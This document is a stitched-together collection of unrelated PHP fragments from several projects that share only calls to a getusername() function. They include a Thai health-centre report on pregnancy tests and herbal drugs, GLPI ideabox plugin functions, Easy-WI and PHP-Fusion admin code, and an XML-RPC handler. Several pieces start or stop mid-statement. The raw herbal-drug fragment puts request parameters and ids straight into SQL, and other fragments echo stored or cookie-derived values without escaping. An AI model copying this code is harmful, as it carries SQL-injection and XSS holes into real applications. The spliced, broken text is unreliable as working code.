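/**
 * Emit map markers (XML) for visits that recorded a pregnancy test.
 *
 * Reads the village filter from $_GET['village'] ("00000000" adds no village
 * filter) and the date-range selector from $_GET['str'], runs the visit query
 * and echoes one <marker/> element per row inside a <markers> root.
 *
 * Request-derived values are escaped before they are placed in the SQL text,
 * and every attribute value is escaped on output, so neither a crafted query
 * string nor stored person/visit data can alter the statement or break out of
 * an XML attribute.
 *
 * @return void
 */
function pregtest()
{
    $village = isset($_GET['village']) ? (string) $_GET['village'] : '';
    $range = isset($_GET['str']) ? $_GET['str'] : null;

    if ($village == "00000000") {
        $wvill = "";
    } else {
        // The village code comes straight from the query string: escape it
        // before it is placed between the quotes of the SQL literal.
        $wvill = " AND house.villcode='" . mysql_real_escape_string($village) . "' ";
    }

    // retdaterangstr()/retdaterangsto() are defined elsewhere; their output is
    // derived from $_GET['str'], so it is treated as untrusted here as well.
    $str = mysql_real_escape_string(retdaterangstr($range));
    $sto = mysql_real_escape_string(retdaterangsto($range));

    $sql = "SELECT
person.pcucodeperson,
person.pid,
person.idcard,
person.fname,
concat(ctitle.titlename, person.fname , ' ' , person.lname) AS pname,
person.birth,
ROUND(DATEDIFF(now(),person.birth)/365.25) AS age,
house.villcode,
house.hno,
house.hcode,
house.xgis,
house.ygis,
visit.visitdate,
visitfp.pregtest,
visitfp.pregtestresult,
visit.username
FROM
house
INNER JOIN person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode
LEFT JOIN ctitle on ctitle.titlecode = person.prename
INNER JOIN visit ON person.pcucodeperson = visit.pcucodeperson AND person.pid = visit.pid
INNER JOIN visitfp ON visit.pcucodeperson = visitfp.pcucodeperson AND visit.pid = visitfp.pid AND visit.visitdate = visitfp.datefp
where visitfp.pregtest = '17' and visit.visitdate between '{$str}' and '{$sto}' {$wvill}
order by visit.visitdate,person.fname";
    $result = mysql_query($sql);

    $xml = '<markers>';
    // A failed query yields an empty <markers/> document instead of warnings.
    while ($result !== false && ($row = mysql_fetch_array($result))) {
        // switch compares loosely, like the == chain it replaces.
        switch ($row['pregtestresult']) {
            case "0":
                $pregtestname = "ไม่ตั้งครรภ์";
                break;
            case "1":
                $pregtestname = "ตั้งครรภ์";
                break;
            case "3":
                $pregtestname = "แปลผลไม่ได้";
                break;
            default:
                $pregtestname = "";
        }

        $appsick = ($row['visitdate'] == "") ? "" : retDatets($row['visitdate']);

        $attrs = array(
            'pid' => $row['pid'],
            'pname' => $row['pname'],
            'age' => $row['age'],
            'hno' => $row['hno'],
            'moo' => substr($row['villcode'], 6, 2),
            'sick' => $appsick,
            'labresult' => $pregtestname,
            'userv' => getusername($row['username']),
            'lat' => $row['ygis'],
            'lng' => $row['xgis'],
        );

        $xml .= '<marker ';
        foreach ($attrs as $attrName => $attrValue) {
            // assumes the connection delivers UTF-8 — TODO confirm; with another
            // charset htmlspecialchars() returns '' on invalid byte sequences.
            $xml .= $attrName . '="' . htmlspecialchars((string) $attrValue, ENT_QUOTES, 'UTF-8') . '" ';
        }
        $xml .= '/>';
    }
    $xml .= '</markers>';

    echo $xml;
}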
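/**
 * Echo the pregnancy-test report as an HTML table.
 *
 * Looks up the facility header line, reads the village filter from
 * $_GET['village'] ("00000000" adds no village filter) and the date-range
 * selector from $_GET['str'], then prints one table row per matching visit.
 *
 * Request-derived values are escaped before they enter the SQL text, and all
 * dynamic values are HTML-escaped on output, so a crafted query string or
 * stored person/user data cannot change the statement or inject markup.
 *
 * @return void
 */
function pregtest()
{
    $sql = "SELECT
 concat('สถานบริการ(สถานีอนามัย/PCU): ',chospital.`hosname`,' หมู่ที่:',ifnull(chospital.`mu`,'...'),' ต.',
	ifnull(csubdistrict.`subdistname`,' ...'),' อ.',ifnull(cdistrict.`distname`,' ...'),' จ.',
	ifnull(cprovince.`provname`,'...')) AS chospital_hosname
FROM
 `chospital` chospital 
 INNER JOIN `office` office ON chospital.`hoscode` = office.`offid`
 left outer join `csubdistrict` csubdistrict ON chospital.`provcode` = csubdistrict.`provcode`
 AND chospital.`distcode` = csubdistrict.`distcode`
 AND chospital.`subdistcode` = csubdistrict.`subdistcode`
 left outer JOIN `cdistrict` cdistrict ON chospital.`provcode` = cdistrict.`provcode`
 AND chospital.`distcode` = cdistrict.`distcode`
 INNER JOIN `cprovince` cprovince ON chospital.`provcode` = cprovince.`provcode`";
    $result = mysql_query($sql);
    $row = ($result !== false) ? mysql_fetch_array($result) : false;
    $hosp = $row ? $row['chospital_hosname'] : '';

    $village = isset($_GET['village']) ? (string) $_GET['village'] : '';
    $range = isset($_GET['str']) ? $_GET['str'] : null;

    if ($village == "00000000") {
        $wvill = "";
        $mu = "ทุกหมู่บ้าน";
    } else {
        // The village code comes straight from the query string: escape it
        // before it is placed between the quotes of the SQL literal.
        $wvill = " AND house.villcode='" . mysql_real_escape_string($village) . "' ";
        $mu = getvillagename($village);
    }

    // The range helpers are defined elsewhere; their output is derived from
    // $_GET['str'], so it is escaped for SQL and, separately, for HTML.
    $rangeFrom = retdaterangstr($range);
    $rangeTo = retdaterangsto($range);
    $str = mysql_real_escape_string($rangeFrom);
    $sto = mysql_real_escape_string($rangeTo);

    // assumes page and connection are UTF-8 — TODO confirm; with another
    // charset htmlspecialchars() returns '' on invalid byte sequences.
    $strx = htmlspecialchars((string) retDatets($rangeFrom), ENT_QUOTES, 'UTF-8');
    $stox = htmlspecialchars((string) retDatets($rangeTo), ENT_QUOTES, 'UTF-8');
    $mu = htmlspecialchars((string) $mu, ENT_QUOTES, 'UTF-8');
    $hosp = htmlspecialchars((string) $hosp, ENT_QUOTES, 'UTF-8');

    $sql = "SELECT
person.pcucodeperson,
person.pid,
person.idcard,
person.fname,
concat(ctitle.titlename, person.fname , ' ' , person.lname) AS pname,
person.birth,
ROUND(DATEDIFF(now(),person.birth)/365.25) AS age,
house.villcode,
house.hno,
house.hcode,
house.xgis,
house.ygis,
visit.visitdate,
visitfp.pregtest,
visitfp.pregtestresult,
visit.username
FROM
house
INNER JOIN person ON house.pcucode = person.pcucodeperson AND house.hcode = person.hcode
LEFT JOIN ctitle on ctitle.titlecode = person.prename
INNER JOIN visit ON person.pcucodeperson = visit.pcucodeperson AND person.pid = visit.pid
INNER JOIN visitfp ON visit.pcucodeperson = visitfp.pcucodeperson AND visit.pid = visitfp.pid AND visit.visitdate = visitfp.datefp
where visitfp.pregtest = '17' and visit.visitdate between '{$str}' and '{$sto}' {$wvill}
order by visit.visitdate,person.fname";
    $result = mysql_query($sql);

    $txt = '<p align=\'center\'><b>รายงานการตรวจทดสอบการตั้งครรภ์<br>';
    $txt .= "ข้อมูลวันที่ {$strx} ถึง {$stox} {$mu}</b></p><b>{$hosp}</b>"
        . "<table width='99%' border='0' cellspacing='1' cellpadding='1' class='table table-striped table-hover table-bordered'>\n <tr>\n"
        . " <th width='4%' scope='col'><div align='center'>ลำดับ</th>\n"
        . "\t<th width='5%' scope='col'><div align='center'>HN</th>\n"
        . " <th width='10%' scope='col'><div align='center'>ชื่อ - สกุล</th>\n"
        . "\t<th width='5%' scope='col'><div align='center'>อายุ</th>\n"
        . " <th width='6%' scope='col'><div align='center'>บ้านเลขที่</th>\n"
        . "\t<th width='4%' scope='col'><div align='center'>หมู่ที่</th>\n"
        . " <th width='4%' scope='col'><div align='center'>วันที่ตรวจ</th>\n"
        . "\t<th width='9%' scope='col'><div align='center'>ผลการตรวจ</th>\n"
        . "\t<th width='9%' scope='col'><div align='center'>ผู้ตรวจ</th>\n </tr>";

    // Row counter; the original relied on ++ of an undefined variable.
    $i = 0;
    // A failed query prints the header and an empty table instead of warnings.
    while ($result !== false && ($row = mysql_fetch_array($result))) {
        // switch compares loosely, like the == chain it replaces.
        switch ($row['pregtestresult']) {
            case "0":
                $pregtestname = "ไม่ตั้งครรภ์";
                break;
            case "1":
                $pregtestname = "ตั้งครรภ์";
                break;
            case "3":
                $pregtestname = "แปลผลไม่ได้";
                break;
            default:
                $pregtestname = "";
        }

        $appsick = ($row['visitdate'] == "") ? "" : retDatets($row['visitdate']);

        // Everything that reaches the page is escaped once, here.
        $cell = array(
            'pid' => $row['pid'],
            'pname' => $row['pname'],
            'age' => $row['age'],
            'hno' => $row['hno'],
            'moo' => substr($row['villcode'], 6, 2),
            'sick' => $appsick,
            'userv' => getusername($row['username']),
        );
        foreach ($cell as $key => $value) {
            $cell[$key] = htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
        }

        ++$i;
        $cr = ($i % 2 == 1) ? " class='altrow'" : "";

        $txt .= " <tr {$cr}>\n <td><div align='center'>{$i}</div></td>\n"
            . "\t<td><div align='center'>{$cell['pid']}</div></td>\n"
            . " <td>{$cell['pname']}</td>\n"
            . "\t<td><div align='center'>{$cell['age']}</div></td>\n"
            . " <td><div align='center'>{$cell['hno']}</div></td>\n"
            . " <td><div align='center'>{$cell['moo']}</div></td>\n"
            . "\t<td><div align='center'>{$cell['sick']}</div></td>\n"
            . "\t<td><div align='center'>{$pregtestname}</div></td>\n"
            . "\t<td><div align='left'>{$cell['userv']}</div></td>\n </tr>";
    }
    $txt .= "</table><br>";

    echo $txt;
}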
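/**
 * Return a username for which the users-table lookup finds no existing row.
 *
 * If the lookup returns a row, a new candidate is taken from getrand() and
 * checked again; the name that finally passes is returned to the caller.
 * (The original dropped the recursive call's result, so callers received
 * null whenever the first candidate was already taken.)
 *
 * @param string $tmp_username candidate username
 * @return string the candidate, or a replacement produced by getrand()
 */
function getusername($tmp_username)
{
    global $db, $db_prefix;

    // NOTE(review): the username literal below is masked ('******') on this
    // page. Whatever the real lookup value is, bind it through the driver's
    // parameter or escaping API rather than interpolating $tmp_username.
    $sql = "select * from {$db_prefix}users where username='******' ";
    $result = $db->get_one($sql);

    if (empty($result)) {
        return $tmp_username;
    }

    // Name already present: try a fresh candidate and hand its result back.
    return getusername(getrand());
}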
/**
 * Print the list of comments attached to one idea.
 *
 * Returns false without output when the current user lacks read access to
 * the idea. Users with write access additionally get the mass-action form,
 * a check-all box in the header and a checkbox per row.
 *
 * NOTE(review): the comment name and body are echoed as fetched from the
 * database (the body only passes through nl2br()). Whether they were
 * HTML-encoded when stored is not visible here — confirm before relying on it.
 *
 * @param PluginIdeaboxIdeabox $ideabox idea whose comments are listed
 *
 * @return false|null false when read access is denied, otherwise nothing
 */
function showComments(PluginIdeaboxIdeabox $ideabox)
{
    global $DB, $CFG_GLPI;

    $ideaId = $ideabox->fields['id'];
    if (!$ideabox->can($ideaId, "r")) {
        return false;
    }

    $rand = mt_rand();
    $canedit = $ideabox->can($ideaId, 'w');

    // The id placed in the WHERE clause is read from the already loaded item.
    $query = "SELECT `glpi_plugin_ideabox_comments`.`name` AS name,\n `glpi_plugin_ideabox_comments`.`id`,\n `glpi_plugin_ideabox_comments`.`plugin_ideabox_ideaboxes_id`,\n `glpi_plugin_ideabox_comments`.`date_comment`,\n `glpi_plugin_ideabox_comments`.`comment`,\n `glpi_plugin_ideabox_comments`.`users_id` AS users_id\n FROM `glpi_plugin_ideabox_comments` "
        . " LEFT JOIN `glpi_plugin_ideabox_ideaboxes`\n ON (`glpi_plugin_ideabox_ideaboxes`.`id` = `glpi_plugin_ideabox_comments`.`plugin_ideabox_ideaboxes_id`)"
        . " WHERE `glpi_plugin_ideabox_comments`.`plugin_ideabox_ideaboxes_id` = '" . $ideaId . "'\n ORDER BY `glpi_plugin_ideabox_comments`.`name`";
    $result = $DB->query($query);
    $number = $DB->numrows($result);

    // Mass actions are offered only to editors, and only when rows exist.
    $withActions = $canedit && $number;
    $formName = 'mass' . __CLASS__ . $rand;

    echo "<div class='spaced'>";

    if ($withActions) {
        Html::openMassiveActionsForm($formName);
        $topParams = array();
        Html::showMassiveActions(__CLASS__, $topParams);
    }

    if ($number != 0) {
        echo "<table class='tab_cadre_fixe'>", "<tr>";
        if ($withActions) {
            echo "<th width='10'>" . Html::getCheckAllAsCheckbox($formName) . "</th>";
        }
        foreach (array('Name', 'Author', 'Date', 'Content') as $heading) {
            echo "<th>" . __($heading) . "</th>";
        }
        echo "</tr>";

        Session::initNavigateListItems(
            $this->getType(),
            PluginIdeaboxIdeabox::getTypeName(2) . " = " . $ideabox->fields["name"]
        );

        while ($comment = $DB->fetch_array($result)) {
            Session::addToNavigateListItems($this->getType(), $comment['id']);

            echo "<tr class='tab_bg_1 center'>", "<td width='10'>";
            if ($canedit) {
                Html::showMassiveActionCheckBox(__CLASS__, $comment["id"]);
            }
            echo "</td>";

            $editUrl = $CFG_GLPI["root_doc"] . "/plugins/ideabox/front/comment.form.php?id=" . $comment["id"]
                . "&plugin_ideabox_ideaboxes_id=" . $comment["plugin_ideabox_ideaboxes_id"];

            echo "<td class='center'>", "<a href='" . $editUrl . "'>", $comment["name"];
            // The numeric id is shown when ids are visible or the name is empty.
            if ($_SESSION["glpiis_ids_visible"] || empty($comment["name"])) {
                echo " (" . $comment["id"] . ")";
            }
            echo "</a></td>";

            echo "<td class='center'>" . getusername($comment["users_id"]) . "</td>";
            echo "<td class='center'>" . Html::convdatetime($comment["date_comment"]) . "</td>";
            echo "<td class='left'>" . nl2br($comment["comment"]) . "</td>";
            echo "</tr>";
        }

        echo "</table>";
    }

    if ($withActions) {
        $bottomParams = array('ontop' => false);
        Html::showMassiveActions(__CLASS__, $bottomParams);
        Html::closeForm();
    }

    echo "</div>";
}
$row = mysql_fetch_array($result); $hosp = $row[chospital_hosname]; $str = retdaterangstr($_GET[str]); $sto = retdaterangsto($_GET[str]); $strx = retDatets($str); $stox = retDatets($sto); $sql = "SELECT person.idcard\n,CONVERT(concat(ifnull(titlename,ifnull(prename,'ไม่ระบุ') ),fname,' ',lname) USING utf8) as pname \n,v.pid\n ,CONVERT(case when person.subdistcodemoi is null then 'นอกเขต' \n when person.hnomoi is null then concat(' หมู่ที่ ', person.`mumoi` ,' ต.', csd.`subdistname` )\n when person.mumoi is null then concat(person.`hnomoi` ,' ต.', csd.`subdistname` )\n else concat(person.`hnomoi` ,' หมู่ที่ ', person.`mumoi` ,' ต.', csd.`subdistname` ) end USING utf8) AS address\n ,v.rightcode,rightname,v.visitno,v.pcucode,v.visitdate,chospital.hosname,\n\t GROUP_CONCAT(concat(cdrug.drugname,'<br>')) as drugname,\n\t GROUP_CONCAT(visitdrug.unit) as unit,\n\t GROUP_CONCAT(visitdrug.dateupdate) as dateupdate,\n\t v.username,\nhouse.hno,\nhouse.villcode,\nhouse.xgis,\nhouse.ygis\nfrom visit v left join person on v.pid = person.pid and v.pcucodeperson = person.pcucodeperson\n\tleft join ctitle on person.prename = ctitle.titlecode\n left join cright on v.rightcode = cright.rightcode\n left join house on person.hcode = house.hcode and person.pcucodeperson = house.pcucode\n left join village on house.villcode = village.villcode and house.pcucode = village.pcucode\n left join csubdistrict csd on csd.provcode = left(village.villcode,2) and csd.distcode = substring(village.villcode,3,2) and csd.subdistcode = substring(village.villcode,5,2)\n\tleft join chospital on v.pcucode = chospital.hoscode\n left join visitdrug on v.visitno = visitdrug.visitno and v.pcucode = visitdrug.pcucode\n left join cdrug on visitdrug.drugcode = cdrug.drugcode\nWHERE cdrug.drugtype='10' \n \tand visitdate between '{$str}' and '{$sto}' and (v.flagservice <'04' OR v.flagservice is null OR length(trim(v.flagservice))=0 )\ngroup by v.visitno,v.pcucode\norder by visitdate,village.villcode"; $result = 
mysql_query($sql); $txt = '<p align=\'center\'><b>รายงานผู้รับบริการที่ได้รับยาสมุนไพร<br>'; $txt .= "<p div align='center' class='text-danger'>ข้อมูลระหว่างวันที่ {$strx} ถึง {$stox} </p></div></p><br>{$hosp}</b><br><table width='99%' border='0' cellspacing='1' cellpadding='1' class='table table-striped table-hover table-bordered'>\n <tr>\n <th width='5%' scope='col'>ลำดับ</th>\n\t<th width='11%' scope='col'>เลขบัตรประชาชน</th>\n <th width='11%' scope='col'>ชื่อ - สกุล</th>\n\t<th width='7%' scope='col'>ที่อยู่</th>\n\t<th width='7%' scope='col'>วันที่ใช้บริการ</th>\n\t<th width='20%' scope='col'>วินิจฉัย</th>\n\t<th width='14%' scope='col'>ยาสมุนไพร</th>\n <th width='10%' scope='col'>ผู้ให้บริการ</th>\n\t<th width='6%' scope='col'>จำนวน</th>\n <th width='8%' scope='col'>วันที่บันทึกข้อมูล</th>\n </tr>"; while ($row = mysql_fetch_array($result)) { $moo = substr($row[villcode], 6, 2); $vill = getMooVillage($row[villcode]); $sick = retDatets($row[visitdate]); $dupdate = retDatets($row[dateupdate]); $uname = getusername($row[username]); $sqlv = "SELECT\nvisitdiag.visitno,\nGROUP_CONCAT(concat('<br>',cdisease.diseasecode,' ',cdisease.diseasenamethai)) as diagcoded\nFROM\nvisitdiag\nINNER JOIN cdisease ON visitdiag.diagcode = cdisease.diseasecode\nwhere visitdiag.visitno = {$row['visitno']}\n\t\t\t\t\tORDER BY visitdiag.diagcode"; $resultv = mysql_query($sqlv); $rowv = mysql_fetch_array($resultv); $diagcodex = $rowv[diagcoded]; ++$x; if ($x % 2 == 1) { $cr = " class='altrow'"; } else { $cr = ""; } $txt .= " <tr {$cr}>\n <td><div align='center'>{$x}</div></td>\n\t<td>{$row['idcard']}</td>\n <td>{$row['pname']}</td>\n\t<td>{$row['hno']} หมู่ที่ {$moo}</td>\n <td>{$sick}</td>\n\t<td>{$diagcodex}</td>\n <td>{$row['drugname']}</td>\n\t<td>{$uname}</td>\n\t<td><div align='center'>{$row['unit']} {$row['unitsellname']}</td>\n <td>{$dupdate}</td>\n </tr>"; } $txt .= "</table><br>"; echo $txt; } else {
* Version 3 der Lizenz oder (nach Ihrer Wahl) jeder spaeteren * veroeffentlichten Version, weiterverbreiten und/oder modifizieren. * * Easy-WI wird in der Hoffnung, dass es nuetzlich sein wird, aber * OHNE JEDE GEWAEHELEISTUNG, bereitgestellt; sogar ohne die implizite * Gewaehrleistung der MARKTFAEHIGKEIT oder EIGNUNG FUER EINEN BESTIMMTEN ZWECK. * Siehe die GNU General Public License fuer weitere Details. * * Sie sollten eine Kopie der GNU General Public License zusammen mit diesem * Programm erhalten haben. Wenn nicht, siehe <http://www.gnu.org/licenses/>. */ if (!isset($admin_id) or !isset($reseller_id) or $main != 1 or isset($admin_id) and !$pa['settings'] or $reseller_id != 0) { redirect('admin.php'); } $loguserid = $admin_id; $logusername = getusername($admin_id); $logusertype = 'admin'; $logreseller = 0; $logsubuser = 0; $sprache = getlanguagefile('columns', $user_language, $reseller_id); if ($ui->w('action', 4, 'post') and !token(true)) { $template_file = $spracheResponse->token; } else { if (in_array($ui->st('d', 'get'), array('ad', 'md'))) { $id = $ui->id('id', 10, 'get'); if (in_array($ui->st('action', 'post'), array('ad', 'md'))) { $error = array(); if (!$ui->active('active', 'post')) { $error[] = 'Active'; } if (!$ui->id('length', 10, 'post')) {
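<?php
// Load the signed-in user's record for the personal-information page.
$user = $_SESSION['user_id'];

// NOTE(review): the username literal below is masked ('******') on this page.
// Whatever the real lookup value is, escape or bind it rather than
// interpolating a session value into the statement.
$sql = "SELECT * FROM `user` where `user`.username = '******'";
$result = mysql_query($sql);
if ($result === false) {
    // Driver error text can reveal schema and query details: keep it in the
    // server log and show the visitor a generic message only.
    error_log('profile lookup failed: ' . mysql_error());
    die('Database error');
}
$row = mysql_fetch_array($result);

$mtitle = $row['prename'];
// NOTE(review): the stored password value is copied into a template variable.
// Its use is not visible here; it should never be written into the page.
$mpassword = $row['password'];
$mtitlename = getTitle($row['prename']);
$mfname = $row['fname'];
$mlname = $row['lname'];
$mname = $row['username'];
$mavatar = getavatar($row['username']);
$musername = getusername($row['username']);
$midcard = $row['idcard'];
$hospname = gethospname($row['pcucode']);
$mposition = getuserposition($row['username']);
?> <section class="content-header"> <h1> ข้อมูลส่วนตัว </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">profile</li> </ol> </section> <section class="content"> <div class="row"> <div class="col-md-12"> <!-- Primary box -->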
} else { if ($ip == $row['ip'] and $port == $row['port']) { $errors['ip'] = $sprache->ip; $errors['port'] = $sprache->port; } } } } if (count($errors) == 0) { if ($ui->st('action', 'post') == 'ad' and isset($rootServer)) { $query = $sql->prepare("INSERT INTO `voice_dns` (`active`,`dns`,`ip`,`port`,`tsdnsID`,`userID`,`externalID`,`resellerID`) VALUES (?,?,?,?,?,?,?,?)"); $query->execute(array($active, $dns, $ip, $port, $rootID, $userID, $externalID, $resellerLockupID)); $rowCount = $query->rowCount(); $id = $sql->lastInsertId(); if ($dns == $rootServer['defaultdns']) { $dns = strtolower($id . '-' . getusername($userID) . '.' . $rootServer['defaultdns']); $query = $sql->prepare("UPDATE `voice_dns` SET `dns`=? WHERE `dnsID`=? LIMIT 1"); $query->execute(array($dns, $id)); $rowCount += $query->rowCount(); } $loguseraction = '%add% %tsdns% ' . $ip . ':' . $port . ' ' . $dns; } else { if ($ui->st('action', 'post') == 'md' and $id and isset($rootServer)) { $query = $sql->prepare("UPDATE `voice_dns` SET `active`=?,`dns`=?,`ip`=?,`port`=?,`externalID`=? WHERE `dnsID`=? AND `resellerID`=? LIMIT 1"); $query->execute(array($active, $dns, $ip, $port, $externalID, $id, $resellerLockupID)); $rowCount = $query->rowCount(); $loguseraction = '%mod% %tsdns% ' . $ip . ':' . $port . ' ' . $dns; } } if (isset($rowCount) and $rowCount > 0) { if (isset($rootServer)) {
/**
 * Print the create/edit form for an idea.
 *
 * An existing item ($ID > 0) is checked for read access; otherwise the call
 * is treated as a creation, checked for write access and given empty fields.
 *
 * NOTE(review): the form carries the author id in a hidden 'users_id' input
 * and the stored description is written into the textarea as-is. A hidden
 * field can be changed by the client, and whether the description was
 * HTML-encoded when stored is not visible here — confirm both on the
 * receiving side.
 *
 * @param int   $ID      id of the item to show, <= 0 for a new item
 * @param array $options passed on to the tab/header/button helpers
 *
 * @return bool false when the user may not view the item type, true otherwise
 */
function showForm($ID, $options = array())
{
    if (!$this->canView()) {
        return false;
    }

    $isExisting = $ID > 0;
    if ($isExisting) {
        $this->check($ID, 'r');
    } else {
        // New item: needs write access and a blank field set.
        $this->check(-1, 'w');
        $this->getEmpty();
    }

    $this->showTabs($options);
    $options['colspan'] = 1;
    $this->showFormHeader($options);

    // Name
    echo "<tr class='tab_bg_1'>", "<td>" . __('Name') . "</td>", "<td>";
    Html::autocompletionTextField($this, "name");
    echo "</td>", "</tr>";

    // Helpdesk visibility
    echo "<tr class='tab_bg_1'>", "<td>" . __('Associable to a ticket') . "</td><td>";
    Dropdown::showYesNo('is_helpdesk_visible', $this->fields['is_helpdesk_visible']);
    echo "</td>", "</tr>";

    // Author: the stored one for an existing idea, the current user otherwise.
    echo "<tr class='tab_bg_1'>", "<td>" . __('Author') . "</td><td>";
    echo getusername($isExisting ? $this->fields["users_id"] : Session::getLoginUserID());
    if (!empty($this->fields["date_idea"]) && !empty($ID)) {
        echo " - " . __('Date of submission', 'ideabox') . ": " . Html::convDateTime($this->fields["date_idea"]);
    }
    echo "<input type='hidden' name='users_id' value='" . Session::getLoginUserID() . "'>";
    echo "</td>", "</tr>";

    // Description
    echo "<tr class='tab_bg_1'>", "<td colspan = '2'>";
    echo "<table cellpadding='2' cellspacing='2' border='0'><tr><td>";
    echo __('Description') . "</td></tr>", "<tr><td class='center'>";
    echo "<textarea cols='125' rows='14' name='comment'>" . $this->fields["comment"] . "</textarea>";
    echo "</td></tr></table>", "</td>", "</tr>";

    // An idea without a submission date gets the current time as hidden field.
    if (empty($this->fields["date_idea"])) {
        echo "<input type='hidden' name='date_idea' value=\"" . $_SESSION["glpi_currenttime"] . "\">";
    }

    $this->showFormButtons($options);
    $this->addDivForTabs();

    return true;
}
} elseif ($data['action'] == "admin_adminrights_removed") { echo $locale['132'] . " " . getusername($data['subject']); } elseif ($data['action'] == "admin_adminrights_changed") { echo $locale['133'] . " " . getusername($data['subject']); } elseif ($data['action'] == "admin_groupadminrights_changed") { echo "Groupadminrights changed: " . getgroupname($data['subject']); } elseif ($data['action'] == "admin_blacklist_added") { echo $locale['134']; } elseif ($data['action'] == "admin_blacklist_removed") { echo $locale['135']; } elseif ($data['action'] == "admin_blacklist_changed") { echo $locale['136']; } elseif ($data['action'] == "admin_moderator_added") { echo "Moderator added:" . " " . getusername($data['subject']); } elseif ($data['action'] == "admin_moderator_removed") { echo "Moderator removed:" . " " . getusername($data['subject']); } elseif ($data['action'] == "admin_forumrank_added") { echo $locale['137']; } elseif ($data['action'] == "admin_forumrank_removed") { echo $locale['138']; } elseif ($data['action'] == "admin_forumrank_changed") { echo $locale['139']; } elseif ($data['action'] == "admin_adssystem_in_save") { echo "Advertising in Forum Index changed"; } elseif ($data['action'] == "admin_adssystem_vf_save") { echo "Advertising in Forum Threads changed"; } elseif ($data['action'] == "admin_banners_save") { echo $locale['140']; } elseif ($data['action'] == "admin_banners_preview") { echo $locale['141']; } elseif ($data['action'] == "admin_bbcode_enable") {
<div class="row"> <div class="col-xs-11 col-sm-11 col-md-11 col-lg-11"> <ul class="list-inline"> <li><a href="<?php echo $systemrules; ?> "><span class="glyphicon glyphicon-question-sign"></span> <?php echo _('Help'); ?> </a></li> <?php if (isloggedin() and getprivileges($_COOKIE["loguserid"]) > 0) { echo '<li><a href="admin.php"><span class="glyphicon glyphicon-cog"></span> ', _('Admin'), '</a></li>'; } if (isloggedin()) { echo '<li><span class="glyphicon glyphicon-user"></span> <small>', getusername($_COOKIE["loguserid"]), '</small>'; if (iscreditenabled()) { echo ' (<span id="usercredit" title="', _('Remaining credit'), '">', getusercredit($_COOKIE["loguserid"]), '</span> ', getcreditcurrency(), ' <button type="button" class="btn btn-success btn-xs" id="opencredit" title="', _('Add credit'), '"><span class="glyphicon glyphicon-plus"></span></button>)<span id="couponblock"><br /><span class="form-inline"><input type="text" class="form-control input-sm" id="coupon" placeholder="XXXXXX" /><button type="button" class="btn btn-primary btn-sm" id="validatecoupon" title="', _('Confirm coupon'), '"><span class="glyphicon glyphicon-plus"></span></button></span></span></li>'; } echo '<li><a href="command.php?action=logout" id="logout"><span class="glyphicon glyphicon-log-out"></span> ', _('Log out'), '</a></li>'; } ?> </ul> </div> <div class="col-xs-1 col-sm-1 col-md-1 col-lg-1"> </div> </div> <div class="row"> <div class="col-xs-11 col-sm-11 col-md-11 col-lg-11"> <h1 class="pull-left"><?php echo $systemname;
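/**
 * XML-RPC handler: report the last update time for one user or a list of users.
 *
 * The first request parameter may be
 *  - a struct or array of usernames / integer user ids: the response maps
 *    each resolved username to the value plan_get_last_update() returned;
 *  - a scalar username or integer user id: the response is a single int.
 * Integer ids are translated with getusername(). Any other parameter kind now
 * produces an XML-RPC error response; the original fell through and returned
 * an undefined variable.
 *
 * NOTE(review): the decoded values are passed to plan_get_last_update()
 * without further validation (the original carried a "should add integrity
 * checking here" remark) — confirm that helper treats them as untrusted.
 *
 * @param object $m incoming XML-RPC message
 *
 * @return xmlrpcresp
 */
function getlastupdate($m)
{
    global $xmlrpcerruser;

    $err = "";
    $returnval = null;

    $ul = $m->getParam(0);
    $kind = $ul->kindOf();

    if ($kind == 'struct' || $kind == 'array') {
        $arr = xmlrpc_decode($ul);
        foreach ($arr as $i => $username) {
            if (is_int($username)) {
                $arr[$i] = getusername($username);
            }
        }

        $lastupdate_a = plan_get_last_update($arr);

        // Start from an empty map so an empty result still encodes cleanly.
        $returnarray = array();
        foreach ($lastupdate_a as $i => $update) {
            $returnarray[$arr[$i]] = $update;
        }

        $returnval = new xmlrpcresp(xmlrpc_encode($returnarray));
    } elseif ($kind == 'scalar') {
        if ($ul->scalartyp() == 'int') {
            $username = getusername($ul->scalarval());
        } else {
            $username = $ul->scalarval();
        }

        // Only the part before "___" is the username; take it without
        // assuming the separator is present.
        $parts = explode("___", $username, 2);
        $username = $parts[0];

        $lastact_val = plan_get_last_update($username);
        $returnval = new xmlrpcresp(new xmlrpcval($lastact_val, 'int'));
    } else {
        $err = 'Unsupported parameter type';
    }

    // If an error was recorded, answer with an error response instead.
    if ($err) {
        return new xmlrpcresp(0, $xmlrpcerruser, $err);
    }

    return $returnval;
}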
include_once "ctrl.attendance.php"; //error_reporting(E_ALL); //ini_set( 'display_errors','1'); sec_session_start(); $yr['0'] = $_SESSION['year']; $yr['1'] = $_SESSION['month']; //echo $yr['1']; $out_limit = $_SESSION['sess_user_outtime']; $in_limit = $_SESSION['sess_user_intime']; $to = $_SESSION['sess_user_id']; $rsesult = getmail($to, $db); foreach ($rsesult as $row) { $tosend = $row['email']; //echo $tosend; } $getname = getusername($_SESSION['sess_user_id'], $db); foreach ($getname as $result) { $fname = $result['user_name']; $eid = $result['user_eid']; //echo $eid; } $getCurrentMonth = getCurrentMonth($yr, $_SESSION['sess_user_id'], $db); $to_mail = implode(", ", MailList(getHeaders(1, $db), 'to', $db)); $to_cc = implode(", ", MailList(getHeaders(1, $db), 'cc', $db)); $to_bcc = implode(", ", MailList(getHeaders(1, $db), 'bcc', $db)); $body = '<html> <head><title></title> <style> td{text-align:center; border-bottom: 1px dotted #514F4F;} table{width:900px;} span{color:red;}
